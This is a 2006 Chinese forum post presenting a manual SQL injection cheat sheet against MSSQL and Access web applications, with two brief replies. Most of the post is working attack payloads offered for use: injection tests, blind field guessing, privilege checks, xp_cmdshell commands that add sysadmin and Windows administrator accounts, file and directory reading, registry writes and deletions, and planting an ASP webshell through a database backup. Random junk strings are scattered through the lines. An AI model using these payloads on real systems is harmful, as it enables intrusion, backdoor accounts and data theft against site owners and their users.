社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4443阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 {7$c8i  
  2.初步判断是否是mssql ;and user>0 k *Q<3@S  
qp/v^$EA  
  3.注入参数是字符'and [查询条件] and ''=' 9/hrjItV  
OlAs'TE^  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' Q?3Gk%T0[  
Qk\A c  
  5.判断数据库系统 \=uKHNP?#  
?*E'^~,H)  
  ;and (select count(*) from sysobjects)>0 mssql t"k*PA  
- M[$Zy^  
  ;and (select count(*) from msysobjects)>0 access G]fRk^~  
29!q!g|  
? %`@ub$  
v'VD0+3[H  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 -sw  .  
\<y`!"c  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Fe]B&n  
x*?x=^I{  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,17hGKM  
>+]_5qc  
  9.(1)猜字段的ascii值(access) wW#}:59}  
)+}]+xRWGj  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ROk5]b.  
O) WCW<p  
  (2)猜字段的ascii值(mssql) XLAN Np%E  
FP;Ccl"s  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 s0DGC  
jJuW-(/4[  
  10.测试权限结构(mssql) Q.]}]QE   
c8L~S/t  
%7"X(Ts7B  
cJ1#ge%4  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 3E>frR\!I  
&K/ya7  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- qjf[zF  
} w 5l  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?RK]FP"A  
HRiL.DS  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <FWF<r3F  
7RUofcax  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ZJwrLV  
m9"n4a|:  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- T9]HGB{  
 /o[?D  
  ;and 1=(select IS_MEMBER('db_owner'));-- wQwQXNG  
|g #K]v  
9[m6Li  
mf}O-Igte  
  11.添加mssql和系统的帐户 t?9v^vFR  
q~3,yyu  
  ;exec master.dbo.sp_addlogin username;-- |4T !&[r  
  ;exec master.dbo.sp_password null,username,password;-- E-I-0h2  
0%m)@ukb  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- $% 1vW=d  
<Wp QbQM  
  ;exec master.dbo.xp_cmdshell 'net user username password ow_djv:,  
Bx/L<J@  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- {@tv>!WW  
4?-.Z UT-1  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- $OP7l>KZY  
)('%R|$ /  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- T}"6wywM  
L ]w/P|  
GDD '[;  
.h9l7 nZt  
  12.(1)遍历目录 ")V130<  
b|+wc6   
  ;create table dirs(paths varchar(100), id int) 2Z3('?\z~  
U2`'qsR1  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' Q5FM8Q  
^my].Qpt  
  ;and (select top 1 paths from dirs)>0 *cC_j*1@  
rFC" Jx  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) "g' jPwFG  
J41G&$j(  
e 46/{4F,  
< V\I~;  
  (2)遍历目录 (rkU)Q  
wc!onZX5  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- L+'Fs  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 xo&]RYG[<  
W2z*91$  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ox%9Ph  
N_pJk2E  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 1qf!DMcdZ  
(iR ide  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 I =1+h  
/w]!wM  
<<i3r|}  
BQ @huns3  
  13.mssql中的存储过程 T'LIrf  
sgO'wXcoP  
  xp_regenumvalues 注册表根键, 子键 dw TMq*e  
I('Un@hS  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Rr!Y3)f;  
7^Ns&Q  
  xp_regread 根键,子键,键值名 v{9t]s>B  
X`fn8~5  
  ;exec xp_regread C&6IU8l\  
XK: 9r{r{  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 M?[h0{^K  
^b7GH9<&  
  xp_regwrite 根键,子键, 值名, 值类型, 值 rtL}W__  
.N*Pl(<[  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 VMCLHpSfW  
({NAMc*  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 k iRa+w:  
=IUUeFv +r  
  xp_regdeletevalue 根键,子键,值名 !>>f(t4  
%s&ChM?8F  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >-O/U5<!  
xY$iz)^0&  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Y}[c^$S  
<}sq?Sfq!  
;>AL`M+  
1?| f lK  
  14.mssql的backup创建webshell 0 s 70r  
2hee./F`  
  use model wN2QK6Oc  
O)Y?=G)  
  create table cmd(str image); 3;8!rNN  
ZvUC I8  
  insert into cmd(str) values (''); Y& F=t/U2  
&`fhEN  
  backup database model to disk='c:\l.asp'; {&"L~>/o  
(I@rLvZr{  
tOOchu?=  
iC*F  
  15.mssql内置函数 [xT:]Pw}  
EZYBeqv  
  ;and (select @@version)>0 获得Windows的版本号 9 Rx s  
0d3+0EN{  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa gd0Vp Xf'  
|,aG%MTL  
  ;and (select user_name())>0 爆当前系统的连接用户 1]}#)-  
Y2O"]phi@  
  ;and (select db_name())>0 得到当前连接的数据库 ;/0 Q1-  
!o>H1#2l  
/[9t`  
e5OsI Vtjr  
  16.简洁的webshell nwN@DqO  
/"?HZ% W  
  use model oX4q`rt  
~`D|IWMDq  
  create table cmd(str image); Z(ZiFPx2Z  
?]rPRV  
  insert into cmd(str) values (''); b]7GmRekl  
/RyR>G!  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
10+5=?,请输入中文答案:十五